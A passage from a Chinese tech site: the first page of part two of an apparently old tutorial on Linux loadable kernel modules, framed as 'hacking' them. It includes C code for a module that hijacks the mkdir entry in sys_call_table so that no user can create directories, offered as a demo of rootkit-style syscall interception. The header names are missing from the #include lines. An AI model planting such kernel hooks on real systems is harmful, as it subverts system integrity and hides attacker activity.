·	[Java论坛][安全论坛][数据库论坛][操作系统论坛]

·	[访谈] 网银安全系列访谈之：惊心动魄网银故事

·	[热点专题] 网银安全系列　 3G上网卡巡礼

·	[订阅IT技术周刊][IT资源下载专区][病毒求助专区]

·	[热点] 跨站脚本十二问四步防范Conficker

·	[热点] Windows 7 RC版公开下载　憾缺中文版

Linux系统可卸载内核模块完全指南（中）（1）

发布时间：2005.09.21 21:26 来源：Silversand.net 作者：IHH

前面我们讲了Linux系统可卸载内核模块完全指南（上）的内容，本期我们讲中间部份的内容。

第二部分渐入佳境

2.1 如何截获系统调用

现在我们开始入侵LKM，在正常情况下LKMs是用来扩展内核的(特别是那些硬件驱动)。然而我们的‘Hacks’做一些不一样的事情。他们会截获系统调用并且更改他们，为了改变系统某些命令的响应方式。

下面的这个模块可以使得任何用户都不能创建目录。这只不过是我们随后方法的一个小小演示。

#define MODULE
#define __KERNEL__
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
extern void* sys_call_table[];
/*sys_call_talbe 被引入，所以我们可以存取他*/
int (*orig_mkdir)(const char *path);
/*原始系统调用*/
int hacked_mkdir(const char *path)
{
return 0;
/*其他一切正常，除了新建操作，该操作什么也不做*/
}
int init_module(void)
/*初始化模块*/
{
orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hacked_mkdir;
return 0;
}
void cleanup_module(void)
/*卸载模块*/
{
sys_call_table[SYS_mkdir]=orig_mkdir;
/*恢复mkdir系统调用到原来的哪个*/
}

1 2 3 4 5 6 7 下一页>>

[ 发表评论 ] 字体[ 大中小 ] [ 打印 ] [ 进入博客 ] [ 进入论坛 ] [ 推荐给朋友 ]

【相关文章】

·	深入OpenOffice.org之二应用XML文件格式	(09-21)	·	怎样利用IP Queue机制编写用户态防火墙	(09-21)
·	嵌入式Linux也SOHO SIPS技术应用简介	(09-21)	·	构筑Linux防火墙之IPtables的概念与用法	(09-21)
·	揭秘Linux内核调试器之内幕	(09-20)	·	Linux程序应用开发环境和工具经验谈	(09-20)
·	Linux世界驰骋四——文件系统和设备管理	(09-20)	·	在linux操作系统中如何截获系统调用	(09-20)
·	Linux常见问题1000个为什么详细解答之五	(09-20)	·	Linux系统可卸载内核模块完全指南（上）	(09-20)